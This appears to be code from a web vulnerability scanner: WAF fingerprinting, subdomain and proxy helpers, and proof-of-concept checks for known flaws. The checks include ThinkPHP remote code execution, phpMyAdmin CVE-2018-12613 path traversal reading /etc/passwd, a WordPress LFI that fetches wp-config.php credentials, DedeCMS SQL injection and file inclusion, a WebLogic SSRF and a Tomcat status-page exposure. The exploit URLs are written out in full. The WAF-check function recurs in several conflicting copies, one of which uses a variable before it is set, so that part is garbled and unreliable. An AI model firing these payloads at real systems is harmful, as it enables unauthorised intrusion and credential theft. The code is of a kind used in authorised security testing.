def check_waf(target, logger_type, proxy = None): # folder = Path.cwd().parent # waf_file = str(folder / "data/waf_signature") waf_file = "data/waf_signature" logger = factory_logger(logger_type,target,"Waf") with open(waf_file,'r') as loader: waf_data = json.load(loader) waf_match = {0: None} waf_info = {'company': None, 'waf_type': None, 'bypass_known': None} for intruder in waf_checker: try: target, payload = chambering(target, strike=True, payload=intruder) response = requester(target, payload, GET=True, timeout=5, proxy=proxy) if not response is None: page, code, headers = response.text, response.status_code, response.headers if code >= 400: match = 0 for waf_name, waf_signature in waf_data.items(): if re.search(waf_signature['regex'],page,re.I): match = match + 1 if "code" in waf_signature: if re.search(waf_signature['code'],code,re.I): match = match + 1 if "header" in waf_signature: if re.search(waf_signature["header"],headers,re.I): match = match +1 if match > max(waf_match,key=waf_match.get): waf_info['company'] = waf_name waf_info['waf_type'] = waf_signature['name'] if 'bypass_known' not in waf_signature: waf_info['bypass_known'] = None else: waf_info['bypass_known'] = waf_signature['bypass_known'] waf_match.clear() waf_match[match] : waf_info except Exception: pass if max(waf_match,key=waf_match.get) > 0: logger.info(match) else: print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")
def __init__(self,target,file,logger_type): self.file = file self.time = time self.subdomains = set() self.file_loader = asyncio.Queue() self.loop = asyncio.get_event_loop() self.domain = target.split(".", target.count(".") - 1)[-1] self.resolver = aiodns.DNSResolver(timeout=3, loop=self.loop) self.logger = factory_logger(logger_type, target, 'subdomain')
def detect_info(target, logger_type): logger_middle = factory_logger(logger_type, target, "middleware") print(f"{red}[!][{time}] Collecting middleware information....{end}") info = { 'Waf': None, 'CDN': None, 'CMS': None, 'Web Servers': None, 'Web Frameworks': None, 'Operating Systems': None, 'JavaScript Frameworks': None, 'Programming Languages': None } keys = [ 'Waf', 'CDN', 'Web Servers', 'Web Frameworks', 'Operating Systems', 'JavaScript Frameworks', 'Programming Languages' ] url, data = chambering(target, strike=False) try: response = requester(url, data, GET=True) whatweb_dict = { "url": response.url, "text": response.text, "headers": dict(response.headers) } whatweb_dict = json.dumps(whatweb_dict) whatweb_dict = whatweb_dict.encode() whatweb_dict = zlib.compress(whatweb_dict) data = {"info": whatweb_dict} result = requests.post("http://whatweb.bugscaner.com/api.go", files=data) data_json = result.json() data = dict(data_json) except Exception: pass if 'error' not in data: for key in keys: if key in dict(data): info[key] = data[key] logger_middle.info(info) return info else: info.clear() info['message'] = "Error Message!" logger_middle.info(info)
def tomcat_cve_2018_11759(self): url = self.url + "/jkstatus;?cmd=dump" try: response = requests.get(url, timeout=5) if response.status_code == 200 and "ServerRoot=*" in response.text: self.logger.critical(f"url : {url}\n" f"Tomcat_cve_2018_11759 exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Tomcat_cve_2018_11759 not found !")
def dedecms_membergroup_sqli(self): url = self.url + "/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+123456789+--+@`'`" try: response = requests.get(url, timeout=5) if response.status_code == 200 and "123456789" in response.text: self.logger.critical(f"url : {url}\n" f"Dedecms_membergroup_sqli exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Dedecms_membergroup_sqli not found !")
def weblogic_ssrf(self): url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700" try: response = requests.get(url, timeout=5) if response.status_code == 200 and "'127.1.1.1'" in response.text or "Socket Closed" in response.text: self.logger.critical(f"url : {url}\n" f"Weblogic_ssrf exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Weblogic ssrf not found !")
def __init__(self,target,logger_type,subdomain_queue = None,file = None): self.file = file self.target = target self.requests_seen = set() self.filter_ = Filter.filter self.logger_type = logger_type self.target_url = queue.Queue() self.Attack_target = queue.Queue() self.target_domain = queue.Queue() self.domain = extract_domain(target) self.subdomains_queue = subdomain_queue self.logger = factory_logger(logger_type,target,"vulnerable")
def dedecms_file_inclusion(self): url = self.url + r'/plus/carbuyaction.php?dopost=return&code=../../' try: response = requests.get(url, timeout=5) if response.status_code == 200: self.logger.critical(f"url : {url}\n" f"Dedecms_file_inclusion exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Dedecms_file_inclusion not found !")
def phpmyadmin_CVE_2018_12613(self): url = self.url + r'/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' try: response = requests.get(url, timeout=5) if response.status_code == 200 and re.match( r'root:[x*]:0:0:', response.text, re.I): self.logger.critical(f"url : {url}\n" f"Phpmyadmin_CVE_2018_12613 exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Phpmyadmin_CVE_2018_12613 not found !")
def wordpress_lfi(self): url = self.url + "/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php" try: response = requests.get(url, timeout=5) if response.status_code == 200 and "DB_NAME" in response.text and "DB_USER" in response.text and "DB_PASSWORD" in response.text: self.logger.critical( f"url : {url}\n" f"Wordpress Local file include exists !\n") except: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Wordpress Local file include not found !")
def thinkphp_RCE_CVE_2018_5955(self): print(f"") url = self.url + r'/index.php?s=/Index/\think\app/invokefunction&function=' \ r'call_user_func_array&vars[0]=phpinfo&vars[1][]=-1' try: response = requester(url, data=None, GET=True, timeout=5) if response.status_code == 500 and 'PHP' in response.text and 'System' in response.text: self.logger.critical(f"url : {url}\n" f"Thinkphp_RCE_CVE_2018_5955 exists !\n") except Exception: self.logger_ = factory_logger(self.logger_type, self.target, "poc not found") self.logger_.info("Thinkphp_RCE_CVE_2018_5955 not found !")
def __init__(self,target,logger_type): self.filter_proxy = set() self.container = queue.Queue() # self.logger = factory_logger("StreamLogger","qq.com","proxy_generator") self.logger = factory_logger(logger_type, target, "proxy_generator") # self.filter_proxy = Filter() self.dic = { 'data5u' : regex.data5u, 'xicidaili' : regex.xicidaili, 'iphai' : regex.iphai, 'xiladaili' : regex.xiladaili, 'ip3366' : regex.ip3366, 'ip_jiangxianli' : regex.jiangxianli, 'ip_huan' : regex.ip_huan } self.list_name = ['data5u', 'xicidaili', 'iphai']
def __init__(self, url, logger_type, middleware_info=None, middleware_type=None): self.url = url self._dic = middleware_info self.target = url self.logger_type = logger_type self.logger = factory_logger(logger_type, url, "poc") self.middleware_type = middleware_type self.midd_dic = { "thinkphp": self.thinkphp_RCE_CVE_2018_5955, "phpmyadmin": self.phpmyadmin_CVE_2018_12613, "dedecms": (self.dedecms_file_inclusion, self.dedecms_membergroup_sqli), "tomcat": self.tomcat_cve_2018_11759, "weblogic": self.weblogic_ssrf, "wordpress": self.wordpress_lfi }
def check_waf(target, logger_type, proxy = None): original_target = target if "=" not in original_target: # 检验URL是否有效 print(f"{red}[!][{time}] Please provide a url with parameters! {end}") quit() # folder = Path.cwd().parent # Debug 使用 # waf_file = str(folder / "data/waf_signature") waf_file = "data/waf_signature" logger = factory_logger(logger_type,target,"Waf") with open(waf_file,'r') as loader: # 加载WAF指纹信息 waf_data = json.load(loader) waf_match = {0: None} waf_info = {'company': None, 'waf_type': None, 'bypass_known': None} for intruder in waf_checker: # 加载fuzz payload , 测试waf try: intruder_type = "XSS" if intruder.startswith("<") else "SQLi" target, payload = chambering(original_target, strike=True, payload=intruder,type = intruder_type) # ('www.baidu.com', {'a': '1', 'bb': '22'}) response = requester(target, payload, GET=True, timeout=5, proxy=proxy) # 发送payload print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}") if not response is None: page, code, headers = response.text, response.status_code, response.headers if code >= 400: match = 0 for waf_name, waf_signature in waf_data.items(): # 返回信息与WAF指纹库匹配 大小写不敏感 if re.search(waf_signature['regex'],page,re.I): match = match + 1 if "code" in waf_signature: if re.search(waf_signature['code'],code,re.I): match = match + 1 if "header" in waf_signature: if re.search(waf_signature["header"],headers,re.I): match = match +1 if match > max(waf_match,key=waf_match.get): # 取waf_match字典中的key最大值,做判断 获取到最佳匹配 waf_info['company'] = waf_name waf_info['waf_type'] = waf_signature['name'] if 'bypass_known' not in waf_signature: # 检测有没有绕过方法 waf_info['bypass_known'] = None else: waf_info['bypass_known'] = waf_signature['bypass_known'] waf_match.clear() waf_match[match] : waf_info except Exception: pass if max(waf_match,key=waf_match.get) > 0: # 输出匹配到的WAF信息 logger.info(match) else: print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")
def check_waf(target, logger_type, proxy = None): original_target = target if "=" not in original_target: print(f"{red}[!][{time}] Please provide a url with parameters! {end}") quit() # folder = Path.cwd().parent # waf_file = str(folder / "data/waf_signature") waf_file = "data/waf_signature" logger = factory_logger(logger_type,target,"Waf") with open(waf_file,'r') as loader: waf_data = json.load(loader) waf_match = {0: None} waf_info = {'company': None, 'waf_type': None, 'bypass_known': None} for intruder in waf_checker: try: intruder_type = "XSS" if intruder.startswith("<") else "SQLi" target, payload = chambering(original_target, strike=True, payload=intruder,type = intruder_type) response = requester(target, payload, GET=True, timeout=5, proxy=proxy) print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}") if code >= 400 and not response is None: match = 0 page, code, headers = response.text, response.status_code, response.headers for waf_name, waf_signature in waf_data.items(): if re.search(waf_signature['regex'],page,re.I): match = match + 1 if "code" in waf_signature: if re.search(waf_signature['code'],code,re.I): match = match + 1 if "header" in waf_signature: if re.search(waf_signature["header"],headers,re.I): match = match +1 if match > max(waf_match,key=waf_match.get): waf_info['company'] = waf_name waf_info['waf_type'] = waf_signature['name'] if 'bypass_known' not in waf_signature: waf_info['bypass_known'] = None else: waf_info['bypass_known'] = waf_signature['bypass_known'] waf_match.clear() waf_match[match] : waf_info except Exception: pass if max(waf_match,key=waf_match.get) > 0: logger.info(match) else: print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")